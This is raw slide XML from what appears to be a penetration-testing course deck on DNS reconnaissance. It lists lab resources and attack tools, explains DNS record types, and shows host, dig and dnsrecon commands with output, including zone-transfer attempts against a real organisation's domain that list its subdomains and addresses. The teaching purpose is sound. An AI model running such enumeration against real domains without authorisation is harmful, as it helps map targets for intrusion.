              <a:t>https://sourceforge.net/projects/samurai/files/latest/download?source=files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vuln Hub: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.vulnhub.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SecLists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/danielmiessler/SecLists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Burp Suite: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>portswigger.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/burp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/SecureAuthCorp/impacket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kali Meta Packages: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tools.kali.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/kali-metapackages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Katoolin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId9">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/LionSec/katoolin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1414458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BD215-2C99-3249-9139-253A2258A1F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS Records</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DC27B25-03B6-814D-BF19-D51D6A0F0F68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A – Maps the domain name to an IPv4 address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AAAA – Maps the domain name to an IPv6 address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CNAME – Canonical Name Record or Alias Record that specifies that one domain name is an alias of another canonical domain name. A record can be in another zone name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MX – One or more mail servers for the domain name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TXT – Contains arbitrary data for the domain. SPF, DMARC are two examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SRV – Contains the hostname and port number, of servers for specified services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PTR - Resolves an IP address to a domain or host name, a reverse DNS lookup.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107175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3D08-AE1A-0848-B4F9-4183AB36112D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS - host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DB50C63-B7F5-104D-944D-ED35C5C3D75F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resolve domain to IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has address 45.60.122.186</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has address 45.60.132.186</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is an alias for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has address 45.60.132.186</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> mail is handled by 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar-org.mail.protection.outlook.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PTR record resolve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># host 172.228.99.38</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>38.99.228.172.in-addr.arpa domain name pointer a172-228-99-38.deploy.static.akamaitechnologies.com.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3447653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3D08-AE1A-0848-B4F9-4183AB36112D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS - host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DB50C63-B7F5-104D-944D-ED35C5C3D75F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specify record type to return</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># host -t ns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> name server ns1.abanet.org.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> name server auth1.dns.cogentco.com.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> name server ns2.abanet.org.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> name server auth4.dns.cogentco.com.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3901614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3D08-AE1A-0848-B4F9-4183AB36112D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS - host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DB50C63-B7F5-104D-944D-ED35C5C3D75F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Zone transfer from unprotected nameserver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t># host -l -a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> ns1.abanet.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Using domain server:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Name: ns1.abanet.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Address: 38.99.228.188#53</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Aliases:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ev.americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> name server anubis2.abanet.org.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>em.americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> has address 13.111.18.27</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>click.em.americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> has address 13.111.119.164</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>cloud.em.americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> has address 13.111.118.235</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>mta.em.americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> has address 13.111.112.184</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2240828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2D94-4280-3649-9BEB-389B0082D340}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS - dig</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C81DE59-1223-5B47-A435-39ABCC551E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Record look up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># dig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -t any</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lookup specifying nameserver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># dig @ns1.abanet.org </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cname</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PTR record lookup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># dig -x 172.228.99.38</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zone transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># dig @ns1.abanet.org </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>axfr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SRV record lookup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>dig _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sipfederationtls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>._</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp.americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>srv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3960223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26EFC-2218-9A4A-8FB8-B6CA9CE52206}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnsrecon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88A0094C-BC93-2D49-84D6-D96EF871CCBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnsrecon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>axfr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Testing NS Servers for Zone Transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Checking for Zone Transfer for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> name servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Resolving SOA Record</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Resolving NS Records</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Trying NS server 38.99.228.188</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[+] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>38.99.228.188 Has port 53 TCP Open</a:t>
            </a:r>
          </a:p>
